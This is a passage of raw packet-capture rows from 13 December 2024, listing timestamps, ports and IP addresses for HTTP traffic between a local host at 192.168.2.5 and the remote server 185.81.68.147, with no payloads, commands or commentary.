                                                                                                                                                                Dec 13, 2024 01:37:09.366168022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366174936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.366184950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366193056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.366203070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366218090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366220951 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.366234064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366250038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366266012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366272926 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.366293907 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.366627932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366646051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366661072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.366739035 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.366761923 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.367160082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.367327929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.367433071 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.368088961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.368253946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.368366957 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.368988037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.369107962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.369546890 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.369865894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.369991064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.370090008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.370805979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.370925903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.371436119 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.371705055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.371795893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.372677088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.372761965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.372783899 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.372826099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.373543978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.373661995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.374428034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.374456882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.374536037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.374572039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.375359058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.375446081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.375564098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.376262903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.376341105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.377145052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.377250910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.377266884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.377311945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.378078938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.378156900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.379004002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.379117012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.379137039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.379182100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.379903078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.380004883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.380827904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.380930901 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.380934954 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.380975962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.381710052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.381817102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.382621050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.382714033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.382730007 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.382766008 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.383537054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.383641958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.383778095 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.384443045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.384563923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.384666920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.385351896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.385473013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.386279106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.386306047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.386428118 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.386449099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.387170076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.387280941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.387386084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.388129950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.388175011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.388940096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.389024019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.533158064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.533278942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.533572912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.533657074 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.533670902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.533710957 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.534426928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.534554005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.534637928 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.535356998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.535454035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.535537958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.536226988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.536354065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.536443949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.537153959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.537264109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.538072109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.538182020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.538193941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.538220882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.538947105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.539056063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.539879084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.539967060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.540725946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.540833950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.540848970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.540945053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.540956974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.541661978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.541820049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.541929960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.542587042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.542714119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.543510914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.543595076 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.543689966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.543788910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.544425964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.544542074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.544651985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.545341969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.545448065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.546238899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.546324968 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.546396971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.546502113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.547139883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.547250032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.547617912 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.548052073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.548173904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.548996925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.549103022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.549105883 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.549143076 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.549897909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.550000906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.550826073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.550908089 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.550921917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.550965071 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.551708937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.551810026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.551954985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.552599907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.552709103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.553534985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.553621054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.553630114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.553668976 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.554421902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.554543018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.555401087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.555489063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.555521011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.555624962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.556337118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.556447983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.556760073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.557173014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.557296991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.558056116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.558135986 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.558171988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.558273077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.558995962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.559135914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.559237003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.559889078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.560002089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.560826063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.560905933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.560914993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.560950994 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.561691999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.561825991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.562596083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.562680006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.562731028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.562834024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.563519955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.563648939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.563750982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.564440966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.564567089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.565346003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.565427065 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.565480947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.565584898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.566229105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.566360950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.567080975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.567181110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.567260981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.568149090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.568239927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.568281889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.568322897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.569010019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.569185019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.569894075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.569983006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.570105076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.570208073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.570833921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.571044922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.571705103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.571785927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.571863890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.571964979 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.572608948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.572740078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.572843075 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.573543072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.573720932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.574435949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.574517965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.574556112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.574652910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.575366974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.575566053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.576277018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.576359034 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.576378107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.576421976 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.577173948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.577285051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.578058958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.578141928 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.578187943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.578290939 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.578978062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.579032898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.579472065 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.579911947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.580044985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.580771923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.580852985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.725114107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.725135088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.725298882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.725415945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.725497961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.725673914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.726325989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.726437092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.726593018 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.727273941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.727431059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.727530003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.728158951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.728218079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.728327036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.729077101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.729207039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.729320049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.730106115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.730214119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.730859041 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.730871916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.730958939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.731121063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.731796026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.731888056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.732012033 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.732732058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.732758045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.732876062 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.733598948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.733710051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.734534979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.734688997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.734709978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.734829903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.735430002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.735582113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.736330032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.736443996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.736449003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.736490011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.737245083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.737392902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.737775087 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.738151073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.738245010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.738359928 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:09.739063978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:09.739182949 CET8049707185.81.68.147192.168.2.5
